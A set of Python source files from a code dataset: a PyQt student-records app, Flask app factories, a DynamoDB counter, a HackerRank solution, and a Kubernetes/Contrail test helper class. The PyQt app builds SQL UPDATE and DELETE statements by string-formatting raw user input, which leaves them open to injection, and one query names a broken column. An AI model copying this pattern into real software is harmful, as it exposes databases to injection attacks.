else:\n self.vupdate.ageSpin.setEnabled(False)\n \n if self.vupdate.checkBox_5.isChecked():\n self.vupdate.gradeCombo.setEnabled(True)\n else:\n self.vupdate.gradeCombo.setEnabled(False)\n\n if self.vupdate.checkBox_6.isChecked():\n self.vupdate.groupCompo.setEnabled(True)\n else:\n self.vupdate.groupCompo.setEnabled(False)\n \n def query(self):\n stdnt = self.vupdate.idEdit.text()\n if stdnt != '':\n if self.vupdate.checkBox.isChecked():\n name = self.vupdate.nameEdit.text()\n n = '''UPDATE alumno\nSET nombre='%s'\nWHERE id_alumno=%s;''' %(name,stdnt)\n else:\n n = ''\n \n if self.vupdate.checkBox_2.isChecked():\n pat = self.vupdate.patEdit.text()\n ap = '''UPDATE alumno\nSET ap_paterno='%s'\nWHERE id_alumno=%s;''' %(pat,stdnt)\n else:\n ap = ''\n \n if self.vupdate.checkBox_3.isChecked():\n mat = self.vupdate.matEdit.text()\n am = '''UPDATE alumno\nSET ap_materno='%s'\nWHERE id_alumno=%s;''' %(mat,stdnt)\n else:\n am = ''\n \n if self.vupdate.checkBox_4.isChecked():\n age = self.vupdate.ageSpin.value()\n e = '''UPDATE alumno\nSET edad=%d\nWHERE id_alumno=%s;''' %(age,stdnt)\n else:\n e = ''\n \n if self.vupdate.checkBox_5.isChecked():\n grade = self.vupdate.gradeCombo.currentText()\n grad = '''UPDATE escolares\nSET grado=%s\nWHERE id_alumno=%s;''' %(grade,stdnt)\n else:\n grad = ''\n \n if self.vupdate.checkBox_6.isChecked():\n group = self.vupdate.groupCompo.currentText()\n gr = '''UPDATE escolares\nSET grupo='%s'\nWHERE id_alumno=%s;''' %(group,stdnt)\n else:\n gr = ''\n \n q = n+ap+am+e+grad+gr\n self.close()\n self.emit(QtCore.SIGNAL('editado'), q)\n else:\n QtGui.QMessageBox.about(self, \"Datos incompletos\", \"Es necesario ingresar la ID del registro a modificar\")\n \nclass deleting(QtGui.QWidget):\n def __init__(self):\n QtGui.QWidget.__init__(self)\n \n self.vdelete = Ui_Del()\n self.vdelete.setupUi(self)\n \n self.connect(self.vdelete.buttonBox, QtCore.SIGNAL('accepted()'), self.query)\n \n def query(self):\n info = self.vdelete.delEdit.text()\n \n if self.vdelete.radioButton.isChecked():\n q = '''DELETE FROM escolares\nWHERE id_alumno=%s;DELETE FROM alumno\nWHERE id_alumno=%s;''' %(info,info)\n elif self.vdelete.gradeCheck.isChecked():\n q = 'DELETE FROM escolares WHERE grado=%s;' %(info)\n elif self.vdelete.ageCheck.isChecked():\n q = 'DELETE FROM alumno WHERE edad=%s;' %(info)\n elif self.vdelete.groupCheck.isChecked():\n q = \"DELETE FROM escolares WHERE grupo='%s';\" %(info)\n elif self.vdelete.matCheck.isChecked():\n q = \"DELETE FROM alumno WHERE ap_materno='%s';\" %(info)\n elif self.vdelete.nameCheck.isChecked():\n q = \"DELETE FROM alumno WHERE nombre='%s';\" %(info)\n elif self.vdelete.patCheck.isChecked():\n q = \"DELETE FROM alumno WHERE ap_='%s';\" %(info)\n \n self.close()\n self.emit(QtCore.SIGNAL('borrado'), q)\n \ndef main():\n app = QtGui.QApplication(sys.argv)\n inicia = login()\n inicia.show()\n sys.exit(app.exec_())\n \nif __name__ == \"__main__\":\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"455020051","text":"# -*- coding: utf-8 -*-\n\"\"\"The app module, containing the app factory function.\"\"\"\nfrom flask import Flask, jsonify\nfrom myapp.views import home # cookiecutter\nfrom myapp.extension import db, redis\nfrom config import Config\n\n\ndef create_app(config_object=Config):\n app = Flask(__name__.split('.')[0], instance_relative_config=True)\n app.config.from_object(config_object)\n app.config.from_pyfile('config.py', silent=True)\n app._static_folder = \"myapp/static\" # set local static folder as default\n register_blueprint(app)\n register_errorhandlers(app)\n register_extensions(app)\n setup_periodic_tasks()\n return app\n\n\ndef register_blueprint(app):\n \"\"\"Register Flask Blueprint\"\"\"\n app.register_blueprint(home.home_blueprint)\n return None\n\n\ndef register_errorhandlers(app):\n \"\"\"Register error handlers.\"\"\"\n\n def render_error(error):\n \"\"\"Render error template.\"\"\"\n # If a HTTPException, pull the `code` attribute; default to 500\n error_code = getattr(error, 'code', 500)\n res = {\n 'status': 'error',\n 'message': '',\n 'code': ''\n }\n if error_code == 401:\n res['message'] = 'Unauthorized'\n res['code'] = '401'\n elif error_code == 403:\n res['message'] = 'Forbidden'\n res['code'] = '403'\n elif error_code == 404:\n res['message'] = 'Not Found'\n res['code'] = '404'\n elif error_code == 500:\n res['message'] = 'Internal Server Error'\n res['code'] = '500'\n # return render_template('{0}.html'.format(error_code)), error_code\n return jsonify(res)\n\n for errcode in [401, 403, 404, 500]:\n app.errorhandler(errcode)(render_error)\n return None\n\n\ndef register_extensions(app):\n db.init_app(app) # register mongoDB\n redis.init_app(app) # register redis\n","sub_path":"myapp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"554068646","text":"from typing import Set\n\nimport boto3\n\nfrom .reserved import RESERVED_KEYWORDS\nfrom .serializers import serialize, deserialize\n\n\nclass RetriesExceeded(Exception): pass\n\nclass Counter:\n\n def __init__(self, table,\n variable_name='current_count',\n client=None,\n endpoint_url=None,\n region_name=None,\n aws_access_key_id=None,\n aws_secret_access_key=None,\n aws_session_token=None,\n **kwargs):\n\n self.table = table\n self.variable_name = variable_name\n\n self._named_variables: Set[str] = set()\n\n self._key = {}\n\n if len(kwargs) > 2 or len(kwargs) == 0:\n raise ValueError(\"The key of the counter can only consist of a Hash Key and an optional Sort Key\")\n\n for key_name, key_value in kwargs.items():\n self._key[key_name] = serialize(key_value)\n\n self._internal_variable_name = self._name_variable(variable_name)\n\n if client:\n self._client = client\n else:\n self._client = boto3.client(\n 'dynamodb',\n endpoint_url=endpoint_url,\n region_name=region_name,\n aws_access_key_id=aws_access_key_id,\n aws_secret_access_key=aws_secret_access_key,\n aws_session_token=aws_session_token\n )\n\n def next(self, increment: int=1, retries=3):\n\n expression_attribute_names = {}\n\n if self._named_variables:\n expression_attribute_names.update({f\"#{var}\": var for var in self._named_variables})\n\n update_request = dict(\n TableName=self.table,\n Key=self._key,\n UpdateExpression=f\"ADD {self._internal_variable_name} :increment\",\n ExpressionAttributeValues={\n ':increment': {'N': str(increment)}\n },\n ReturnValues='UPDATED_NEW'\n )\n\n if expression_attribute_names:\n update_request['ExpressionAttributeNames'] = expression_attribute_names\n\n\n response = self._update_item(update_request, retries=retries)\n result = deserialize(response['Attributes'])\n return int(result[self.variable_name])\n\n def reset(self):\n return self.set(count=0)\n\n def set(self, count: int, retries=3):\n expression_attribute_names = {}\n\n if self._named_variables:\n expression_attribute_names.update({f\"#{var}\": var for var in self._named_variables})\n\n update_request = dict(\n TableName=self.table,\n Key=self._key,\n UpdateExpression=f\"SET {self._internal_variable_name} = :value\",\n ExpressionAttributeValues={\n ':value': {'N': str(count)}\n },\n ReturnValues='UPDATED_NEW'\n )\n\n if expression_attribute_names:\n update_request['ExpressionAttributeNames'] = expression_attribute_names\n\n\n response = self._update_item(update_request, retries=retries)\n result = deserialize(response['Attributes'])\n return int(result[self.variable_name])\n\n def _update_item(self, update_request, retries=0):\n try:\n return self._client.update_item(**update_request)\n except Exception as e:\n print(\"Retrying\", retries)\n if retries == 0:\n print(e)\n raise RetriesExceeded(\"Could not atomically increment {}. Retries exceeded\")\n return self._update_item(update_request=update_request, retries=retries-1)\n\n def _name_variable(self, variable):\n if variable.upper() not in RESERVED_KEYWORDS:\n return variable\n\n self._named_variables.add(variable)\n\n return f\"#{variable}\"\n","sub_path":"dynamodb_counter/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"568798173","text":"# -*- coding: utf-8 -*-\n\nfrom config import config\nfrom flask import Flask\n\nappConfig = config['default']\n\ndef create_app():\n app = Flask(__name__)\n\n app.config.from_mapping(\n SECRET_KEY = appConfig.secret_key,\n )\n \n appConfig.init_app(app)\n\n from . import hello\n app.register_blueprint(hello.bp)\n\n return app","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"206083497","text":"'''\nLilah has a string,s, of lowercase English letters that she repeated infinitely many times.\nGiven an integer,n, find and print the number of letter a's in the first n letters of Lilah's infinite string.\nFor example, if the string s='abcac' and n=10, the substring we consider is abcacabcac, the first 10 characters of her infinite string. There are 4 occurrences of a in the substring.\n'''\nif __name__=='__main__':\n s = input()\n n = int(input())\n L = len(s)\n print(s.count('a') * (n//L) + s[:n % L].count('a'))\n","sub_path":"Interview Preparation kit/01. Warm up challenges/04. Repeated String.py","file_name":"04. Repeated String.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"228419577","text":"from fabric.api import local, settings\n\nimport time\nimport re\nimport test\nimport ipaddress\nimport vnc_api_test\nimport uuid\nfrom tcutils.util import get_random_name, retry\nfrom k8s.pod import PodFixture\nfrom k8s.service import ServiceFixture\nfrom k8s.ingress import IngressFixture\nfrom k8s.namespace import NamespaceFixture\nfrom k8s.tls_secret import TLSSecretFixture\nfrom k8s.deployment import DeploymentFixture\nfrom k8s.network_policy import NetworkPolicyFixture\nfrom common.connections import ContrailConnections\nfrom common import create_public_vn\nfrom common.base import _GenericTestBaseMethods\nfrom vn_test import VNFixture\n\n\nK8S_SERVICE_IPAM = ['default-domain', 'default', 'service-ipam']\nK8S_PUBLIC_VN_NAME = '__public__'\nK8S_PUBLIC_FIP_POOL_NAME = '__fip_pool_public__'\n\n\nclass BaseK8sTest(test.BaseTestCase, _GenericTestBaseMethods, vnc_api_test.VncLibFixture):\n\n @classmethod\n def setUpClass(cls):\n super(BaseK8sTest, cls).setUpClass()\n cls.connections = ContrailConnections(cls.inputs,\n project_name=cls.inputs.admin_tenant,\n username=cls.inputs.admin_username,\n password=cls.inputs.admin_password,\n logger=cls.logger)\n cls.vnc_lib_fixture = cls.connections.vnc_lib_fixture\n cls.vnc_lib = cls.connections.vnc_lib\n cls.agent_inspect = cls.connections.agent_inspect\n cls.cn_inspect = cls.connections.cn_inspect\n cls.analytics_obj = cls.connections.analytics_obj\n cls.api_s_inspect = cls.connections.api_server_inspect\n cls.logger = cls.connections.logger\n cls.k8s_client = cls.connections.k8s_client\n cls.setup_namespace_isolation = False\n cls.public_vn = create_public_vn.PublicVn(connections=cls.connections,\n public_vn=K8S_PUBLIC_VN_NAME,\n public_tenant=cls.inputs.admin_tenant,\n logger=cls.logger,\n fip_pool_name=K8S_PUBLIC_FIP_POOL_NAME,\n api_option='contrail')\n\n # end setUpClass\n\n @classmethod\n def tearDownClass(cls):\n super(BaseK8sTest, cls).tearDownClass()\n # end tearDownClass\n\n def setup_http_service(self,\n name=None,\n namespace='default',\n labels=None,\n metadata=None,\n spec=None,\n type=None,\n external_ips=None,\n frontend_port=80,\n backend_port=80):\n '''\n A simple helper method to create a service\n\n Noticed that nginx continues to listen on port 80 even if target port\n is different. So, recommended not to change backend_port for now\n '''\n metadata = metadata or {}\n spec = spec or {}\n name = name or get_random_name('nginx-svc')\n metadata.update({'name': name})\n selector_dict = {}\n labels = labels or {}\n spec.update({\n 'ports': [\n {\n 'protocol': 'TCP',\n 'port': int(frontend_port),\n 'targetPort': int(backend_port)\n }\n ]\n })\n if labels:\n selector_dict = {'selector': labels}\n spec.update(selector_dict)\n if type:\n type_dict = {'type': type}\n spec.update(type_dict)\n if external_ips:\n external_ips_dict = {'external_i_ps': external_ips}\n spec.update(external_ips_dict)\n\n return self.useFixture(ServiceFixture(\n connections=self.connections,\n name=name,\n namespace=namespace,\n metadata=metadata,\n spec=spec))\n # end setup_http_service\n\n def setup_simple_nginx_ingress(self,\n service_name,\n name=None,\n namespace='default',\n service_port=80,\n **kwargs):\n default_backend = {'service_name': service_name,\n 'service_port': service_port}\n return self.setup_ingress(name=name,\n namespace=namespace,\n default_backend=default_backend,\n **kwargs)\n # end setup_simple_nginx_ingress\n\n def setup_ingress(self,\n name=None,\n namespace='default',\n metadata=None,\n default_backend=None,\n rules=None,\n spec=None,\n **kwargs):\n '''\n A very basic helper method to create an ingress\n\n '''\n if metadata is None: metadata = {}\n if spec is None: spec = {}\n if default_backend is None: default_backend = {}\n if rules is None: rules = []\n tls = kwargs.get('tls', None)\n name = name or get_random_name('nginx-ingress')\n metadata.update({'name': name})\n if default_backend:\n spec.update({'backend': default_backend})\n if rules:\n spec.update({'rules': rules})\n if tls:\n spec.update({'tls': tls})\n\n return self.useFixture(IngressFixture(\n connections=self.connections,\n name=name,\n namespace=namespace,\n metadata=metadata,\n spec=spec,\n tls=tls))\n # end setup_ingress\n\n def setup_namespace(self,\n name=None,\n isolation = None,\n custom_isolation = False,\n fq_network_name = None):\n isolation = isolation or self.setup_namespace_isolation\n if custom_isolation == False:\n vn_fq_name = None\n return self.useFixture(NamespaceFixture(\n connections=self.connections,\n name=name, isolation=isolation,\n custom_isolation = custom_isolation,\n fq_network_name = fq_network_name))\n # end create_namespace\n\n def setup_pod(self,\n name=None,\n namespace='default',\n metadata=None,\n spec=None,\n labels=None,\n custom_isolation = False,\n fq_network_name = {},\n **kwargs):\n name = name or get_random_name('pod')\n metadata = metadata or {}\n spec = spec or {}\n labels = labels or {}\n metadata['name'] = metadata.get('name') or name\n if labels:\n metadata['labels'] = metadata.get('labels', {})\n metadata['labels'].update(labels)\n return self.useFixture(PodFixture(\n connections=self.connections,\n namespace=namespace,\n metadata=metadata,\n spec=spec,\n custom_isolation = custom_isolation,\n fq_network_name = fq_network_name,\n **kwargs))\n # end setup_pod\n\n def setup_nginx_pod(self,\n name=None,\n namespace='default',\n metadata=None,\n container_port=80,\n labels=None,\n spec=None,\n custom_isolation = False,\n fq_network_name = {}):\n '''\n Noticed that nginx continues to listen on port 80 even if target port\n (container_port) is different\n '''\n metadata = metadata or {}\n spec = spec or {}\n labels = labels or {}\n name = name or get_random_name('nginx-pod')\n if labels:\n metadata['labels'] = metadata.get('labels', {})\n metadata['labels'].update(labels)\n spec = spec or {\n 'containers': [\n {'image': 'nginx',\n 'ports': [\n {'container_port': int(container_port)}\n ],\n }\n ]\n }\n return self.setup_pod(name=name,\n namespace=namespace,\n metadata=metadata,\n spec=spec,\n shell='/bin/bash',\n custom_isolation = custom_isolation,\n fq_network_name = fq_network_name)\n\n # end setup_nginx_pod\n\n def verify_nginx_pod(self, pod, path=None):\n result = pod.verify_on_setup()\n if result:\n if path:\n pod.run_cmd('echo %s > /usr/share/nginx/html/index.html' % (pod.name)) \n cmd = \"cp /usr/share/nginx/html/index.html /usr/share/nginx/html/%s\" %(path)\n pod.run_cmd(cmd)\n else:\n pod.run_cmd('echo %s > /usr/share/nginx/html/index.html' % (\n pod.name))\n return result\n # end verify_nginx_pod\n\n def setup_busybox_pod(self,\n name=None,\n namespace='default',\n metadata=None,\n spec=None,\n labels=None,\n custom_isolation = False,\n fq_network_name = {}):\n metadata = metadata or {}\n spec = spec or {}\n labels = labels or {}\n name = name or get_random_name('busybox-pod')\n spec = spec or {\n 'containers': [\n {'image': 'busybox',\n 'command': ['sleep', '1000000'],\n 'image_pull_policy': 'IfNotPresent',\n }\n ],\n 'restart_policy': 'Always',\n }\n return self.setup_pod(name=name,\n namespace=namespace,\n metadata=metadata,\n spec=spec,\n labels=labels,\n shell='/bin/sh',\n custom_isolation = custom_isolation,\n fq_network_name = fq_network_name)\n # end setup_busybox_pod\n\n def setup_ubuntuapp_pod(self,\n name=None,\n namespace='default',\n metadata=None,\n spec=None,\n labels=None):\n metadata = metadata or {}\n spec = spec or {}\n labels = labels or {}\n name = name or get_random_name('ubuntuapp-pod')\n spec = spec or {\n 'containers': [\n {'image': 'ubuntu-upstart',\n 'command': ['sleep', '1000000'],\n 'image_pull_policy': 'IfNotPresent',\n }\n ],\n 'restart_policy': 'Always',\n }\n return self.setup_pod(name=name,\n namespace=namespace,\n metadata=metadata,\n spec=spec,\n labels=labels,\n shell='/bin/sh')\n # end setup_ubuntuapp_pod\n\n @retry(delay=1, tries=5)\n def validate_wget(self, pod, link, expectation=True, **kwargs):\n ret_val = self.do_wget(link, pod=pod, **kwargs)\n result = ret_val == expectation\n if result:\n self.logger.info('wget check of of %s from %s passed' % (link,\n pod.name))\n else:\n self.logger.warn('wget check of of %s from %s failed' % (link,\n pod.name))\n return result\n # end validate_wget\n\n def do_wget(self, link, pod=None, output_file='/dev/null', host='',\n timeout=5, return_output=False, tries=1,\n cert=None):\n '''\n Returns boolean by default\n Returns (boolean, output) if return_output is True\n '''\n host_str = ''\n cert_str = ''\n output = ''\n if host:\n host_str = '--header \"Host:%s\" ' % (host)\n if 'https' in link and not cert:\n cert_str = ' --no-check-certificate'\n cmd = 'wget %s %s -O %s -T %s -t %s %s' % (link, host_str, output_file,\n timeout, tries, cert_str)\n if not pod:\n with settings(warn_only=True):\n output = local(cmd, capture=True)\n pod_str = 'local'\n else:\n output = pod.run_cmd(cmd, shell='/bin/sh -l -c')\n pod_str = 'Pod %s' % (pod.name)\n if '100%' in output:\n self.logger.debug('[Pod %s] Cmd %s passed' % (pod_str, cmd))\n self.logger.debug('[Pod %s] Cmd output: %s' % (pod_str, output))\n result = True\n else:\n self.logger.debug('[Pod %s] Cmd %s failed. Output :%s' % (pod_str,\n cmd, output))\n self.logger.debug('[Pod %s] Cmd output: %s' % (pod_str, output))\n result = False\n if return_output:\n return (result, output)\n else:\n return result\n # end do_wget\n\n @retry(delay=1, tries=5)\n def validate_nginx_lb(self,\n lb_pods,\n service_ip,\n test_pod=None,\n host=None,\n path='',\n port='80',\n barred_pods=None,\n protocol=None,\n cert=None):\n '''\n From test_pod , run wget on http://: and check\n if the all the lb_pods respond to atleast one of the requests over\n 3*len(lb_pods) attempts\n\n barred_pods : pods where the http requests should never be seen\n '''\n host_str = ''\n protocol = protocol or 'http'\n barred_pods = barred_pods or []\n attempts = len(lb_pods) * 5\n hit = {}\n hit_me_not = {}\n for x in lb_pods:\n hit[x.name] = 0\n for x in barred_pods:\n hit_me_not[x.name] = 0\n\n link = '%s://%s:%s/%s' % (protocol, service_ip, port, path)\n for i in range(0, attempts):\n (ret_val, output) = self.do_wget(link, pod=test_pod, host=host,\n output_file='-',\n return_output=True,\n cert=cert)\n for pod in lb_pods:\n if pod.name in output:\n hit[pod.name] += 1\n\n for pod in barred_pods:\n if pod.name in output:\n hit_me_not[pod.name] += 1\n if hit_me_not and 0 not in hit_me_not.values():\n self.logger.warn('HTTP request seem to have hit an unexpected '\n ' pod. Stats : %s' % (hit_me_not))\n return False\n\n if 0 not in hit.values():\n self.logger.info('Responses seen from all pods, lb seems fine.'\n 'Hits : %s' % (hit))\n return True\n if 0 in hit.values():\n msg = ('No http hit seen for one or more pods.'\n 'Pls check. Hits: %s' % (hit))\n self.logger.warn(msg)\n return False\n self.logger.info('Nginx lb hits seem to be ok: %s' % (hit))\n return True\n # end validate_nginx_lb\n\n def setup_update_policy(self,\n pod_selector=None,\n name=None,\n namespace='default',\n metadata=None,\n spec=None,\n policy_types=None,\n ingress=None,\n egress=None,\n update=False,\n np_fixture=None):\n '''\n A helper method to create generic network policy\n Ex :\n ingress = [\n { 'from': [\n { 'pod_selector': {'role': 'frontend' }\n },\n { 'namespace_selector': {'a': 'b' }\n }\n ],\n 'ports': [ 'tcp/80', 'UDP/53' ]'\n },\n ...\n ...\n ]\n egress = [\n { 'to': \n [\n {'ip_block': \n {\"cidr\" : \"1.2.3.4/24\"},\n },\n ],\n \"ports\" : [ 'tcp/80', 'UDP/53' ]\n },\n ...\n ...\n ]\n '''\n metadata = metadata or {}\n spec = spec or {}\n ingress = ingress or {}\n egress = egress or {}\n ingress_list = []\n egress_list = []\n name = name or get_random_name('np-')\n metadata.update({'name': name})\n selector_dict = {}\n pod_selector_dict = {}\n\n if pod_selector is not None:\n pod_selector_dict = {'match_labels': pod_selector}\n\n if ingress is not None:\n ingress_item_dict = {}\n for ingress_item in ingress:\n from_entries = []\n if ingress_item == {}:\n ingress_list.append({})\n break\n for from_item in ingress_item.get('from', {}):\n ingress_pod_dict = {}\n ingress_ns_dict = {}\n ingress_ip_block_dict = {}\n ingress_pod_selector = None\n ingress_ns_selector = None\n ingress_ip_block = None\n \n from_item_dict = from_item.get('pod_selector') or {}\n for k, v in from_item_dict.iteritems():\n if not ingress_pod_dict:\n ingress_pod_dict = {'match_labels': {}}\n ingress_pod_dict['match_labels'].update({k: v})\n ingress_pod_selector = {\n 'pod_selector': ingress_pod_dict}\n\n from_item_dict = from_item.get('namespace_selector') or {}\n for k, v in from_item_dict.iteritems():\n if not ingress_ns_dict:\n ingress_ns_dict = {'match_labels': {}}\n ingress_ns_dict['match_labels'].update({k: v})\n ingress_ns_selector = {\n 'namespace_selector': ingress_ns_dict}\n\n from_item_dict = from_item.get('ip_block') or {}\n for k, v in from_item_dict.iteritems():\n if not ingress_ip_block_dict:\n ingress_ip_block_dict = {'cidr': \"\"}\n if k == \"cidr\":\n ingress_ip_block_dict.update({k: v})\n if k == \"_except\":\n ingress_ip_block_dict.update({k: v})\n ingress_ip_block = {\n 'ip_block': ingress_ip_block_dict}\n \n from_entries.append(ingress_pod_selector or\n ingress_ns_selector or\n ingress_ip_block)\n # end for from_item\n\n port_list = []\n for port_str in ingress_item.get('ports', {}):\n protocol, port = port_str.split('/')\n port_list.append({'protocol': protocol, 'port': int(port)})\n # end for port_str\n if len(from_entries)>0:\n ingress_item_dict = {'from': from_entries}\n if port_list:\n ingress_item_dict.update({'ports': port_list})\n ingress_list.append(ingress_item_dict)\n\n # end for ingress_item\n # end if ingress\n if egress is not None:\n egress_item_dict = {}\n for egress_item in egress:\n to_entries = []\n if egress_item == {}:\n egress_list.append({})\n break\n \n for to_item in egress_item.get('to', {}):\n egress_ip_block_dict = {}\n egress_ip_block = None\n #space\n to_item_dict = to_item.get('ip_block') or {}\n for k, v in to_item_dict.iteritems():\n if not egress_ip_block_dict:\n egress_ip_block_dict = {'cidr': \"\"}\n if k == \"cidr\":\n egress_ip_block_dict.update({k: v})\n egress_ip_block = {\n 'ip_block': egress_ip_block_dict} \n to_entries.append(egress_ip_block)\n # end for from_item\n\n port_list = []\n for port_str in egress_item.get('egress_ports', {}):\n protocol, port = port_str.split('/')\n port_list.append({'protocol': protocol, 'port': int(port)})\n # end for port_str\n if len(to_entries) > 0:\n egress_item_dict = {'to': to_entries}\n if port_list:\n egress_item_dict.update({'egress_ports': port_list})\n egress_list.append(egress_item_dict)\n # end for egress_item\n # end of egress\n \n if policy_types:\n spec['policy_types'] = policy_types\n if ingress:\n spec['ingress'] = ingress_list\n if egress:\n spec['egress'] = egress_list\n spec['pod_selector'] = pod_selector_dict\n\n if update == False:\n return self.useFixture(NetworkPolicyFixture(\n connections=self.connections,\n name=name,\n namespace=namespace,\n metadata=metadata,\n spec=spec))\n else:\n return np_fixture.update(metadata=np_fixture.metadata,\n spec=spec)\n # end setup_policy\n\n def setup_update_simple_policy(self,\n pod_selector=None,\n name=None,\n namespace='default',\n metadata=None,\n spec=None,\n ingress_pods=None,\n ingress_namespaces=None,\n ingress_ipblock=None,\n egress_ipblock=None,\n ingress_all = False,\n egress_all = False,\n policy_types=None,\n ports=None,\n egress_ports=None,\n update = False,\n np_fixture = None):\n '''\n A simple helper method to create a network policy with a single\n ingress entry and a single from condition\n Ex :\n ingress_pod : { 'role': 'frontend'}\n ingress_namespace : { 'project': 'mynamespace'}\n ingress_ipblock : { \"cidr\" : \"10.204.217.0/24\", \"_except\" : [\"10.204.217.4/30\"] }\n egress_ipblock : { \"cidr\" : \"10.204.217.0/24\"}\n ports = ['tcp/80']\n egress_ports = ['tcp/80']\n policy_types = [\"Ingress\"] or [\"Egress\"]\n\n '''\n metadata = metadata or {}\n spec = spec or {}\n ingress_pods = ingress_pods\n ingress_namespaces = ingress_namespaces\n ingress_ipblock = ingress_ipblock\n ports = ports\n egress_ports = egress_ports\n ingress_pod_selector = None\n ns_selector = None\n ingress_ipblock_selector = None\n egress_ipblock_selector = None\n port_list = []\n egress_port_list = []\n name = name or get_random_name('np-')\n metadata.update({'name': name})\n selector_dict = {}\n pod_selector_dict = {}\n policy_types = policy_types\n\n if pod_selector is not None:\n pod_selector_dict = {'match_labels': pod_selector}\n\n if ingress_pods is not None:\n ingress_pod_dict = {'match_labels': {}}\n for k, v in ingress_pods.iteritems():\n ingress_pod_dict['match_labels'].update({k: v})\n ingress_pod_selector = {'pod_selector': ingress_pod_dict}\n\n if ingress_namespaces is not None:\n ingress_ns_dict = {'match_labels': {}}\n for k, v in ingress_namespaces.iteritems():\n ingress_ns_dict['match_labels'].update({k: v})\n ns_selector = {'namespace_selector': ingress_ns_dict}\n\n if ingress_ipblock is not None:\n ingress_ipblock_selector = {'ip_block': ingress_ipblock}\n\n if egress_ipblock is not None:\n egress_ipblock_selector = {'ip_block': egress_ipblock}\n\n if ports is not None:\n for port_str in ports:\n protocol, port = port_str.split('/')\n port_list.append({'protocol': protocol, 'port': int(port)})\n \n if egress_ports is not None:\n for port_str in egress_ports:\n protocol, port = port_str.split('/')\n egress_port_list.append({'protocol': protocol, 'port': int(port)})\n\n if ingress_all == True:\n spec.update({\n 'ingress': [{}]\n })\n elif ingress_pod_selector or ns_selector or ingress_ipblock_selector:\n spec.update({\n 'ingress': [\n {'from': [ingress_pod_selector or ns_selector or ingress_ipblock_selector],\n }\n ]\n })\n elif egress_all == True:\n spec.update({\n 'egress': [{}]\n })\n elif egress_ipblock_selector:\n spec.update({\n 'egress': [\n {'to': [egress_ipblock_selector],\n }\n ]\n })\n #space\n spec.update({'pod_selector': pod_selector_dict})\n if ports is not None and (policy_types == [\"Ingress\"] or policy_types == [] ):\n spec['ingress'][0]['ports'] = port_list\n if egress_ports is not None and policy_types == [\"Egress\"]:\n spec['egress'][0]['egress_ports'] = egress_port_list\n if policy_types:\n spec[\"policy_types\"] = policy_types\n #space\n if update == False:\n return self.useFixture(NetworkPolicyFixture(\n connections=self.connections,\n name=name,\n namespace=namespace,\n metadata=metadata,\n spec=spec))\n else:\n return np_fixture.update(metadata=np_fixture.metadata,\n spec=spec)\n # end setup_simple_policy\n\n def setup_isolation(self, namespace_fixture):\n namespace_fixture.enable_isolation()\n self.addCleanup(namespace_fixture.disable_isolation)\n # end self.setup_isolation\n\n def setup_deployment(self,\n name=None,\n namespace='default',\n metadata=None,\n spec=None,\n min_ready_seconds=None,\n paused=None,\n progress_deadline_seconds=None,\n replicas=None,\n revision_history_limit=None,\n rollback_to=None,\n strategy=None,\n template=None):\n '''\n A helper method to create a deployment\n\n Ref https://github.com/kubernetes-incubator/client-python/blob/master/kubernetes/docs/AppsV1beta1DeploymentSpec.md\n\n '''\n metadata = metadata or {}\n spec = spec or {}\n name = name or get_random_name('dep-')\n metadata.update({'name': name})\n\n if min_ready_seconds:\n spec.update({'min_ready_seconds': min_ready_seconds})\n if paused:\n spec.update({'paused': paused})\n if progress_deadline_seconds:\n spec.update(\n {'progress_deadline_seconds': progress_deadline_seconds})\n if replicas:\n spec.update({'replicas': replicas})\n if revision_history_limit:\n spec.update({'revision_history_limit': revision_history_limit})\n if revision_history_limit:\n spec.update({'revision_history_limit': revision_history_limit})\n if rollback_to:\n spec.update({'rollback_to': rollback_to})\n if strategy:\n spec.update({'strategy': strategy})\n if template:\n spec.update({'template': template})\n\n obj = self.useFixture(DeploymentFixture(\n connections=self.connections,\n namespace=namespace,\n metadata=metadata,\n spec=spec))\n return obj\n # end setup_deployment\n\n def setup_nginx_deployment(self,\n name=None,\n namespace='default',\n replicas=1,\n pod_labels=None,\n container_port=80,\n metadata=None,\n spec=None,\n template_metadata=None,\n template_spec=None):\n\n metadata = metadata or {}\n spec = spec or {}\n pod_labels = pod_labels or {}\n name = name or get_random_name('nginx-dep')\n template_metadata = template_metadata or {}\n\n if pod_labels:\n template_metadata['labels'] = template_metadata.get('labels', {})\n template_metadata['labels'].update(pod_labels)\n template_spec = template_spec or {\n 'containers': [\n {'image': 'nginx',\n 'ports': [\n {'container_port': int(container_port)}\n ],\n }\n ]\n }\n if replicas:\n spec.update({'replicas': replicas})\n spec.update({\n 'template': {\n 'metadata': template_metadata,\n 'spec': template_spec\n }\n })\n return self.setup_deployment(name=name,\n namespace=namespace,\n metadata=metadata,\n spec=spec)\n # end setup_nginx_deployment\n\n def restart_kube_manager(self, ips=None):\n '''\n Restarts kube-managers\n If no ips is specified, restarts all kube-managers on all nodes\n '''\n ips = ips or self.inputs.kube_manager_ips\n\n self.logger.info('Will restart contrail-kube-manager services now on'\n ' %s' %(ips))\n self.inputs.restart_service('contrail-kube-manager', ips,\n container='contrail-kube-manager',\n verify_service=False)\n # end restart_kube_manager\n\n def create_snat_router(self, name):\n\n obj = self.connections.vnc_lib_fixture.vnc_h.create_router(name=name, \n project_obj=self.connections.vnc_lib_fixture.get_project_obj())\n\n self.addCleanup(self.connections.vnc_lib_fixture.vnc_h.delete_router, obj)\n return obj \n\n def connect_vn_with_router(self, router_obj, vn_fq_name):\n\n # Configure VN name from namespace\n\n # Read VN from API\n vn_fq_name_str = ':'.join(vn_fq_name)\n vn_obj=self.vnc_lib.virtual_network_read(fq_name_str=vn_fq_name_str)\n\n # To associate VN to logical router need to create a dummy port\n vmi_id = str(uuid.uuid4())\n vmi_obj = vnc_api_test.VirtualMachineInterface(name=vmi_id,\n 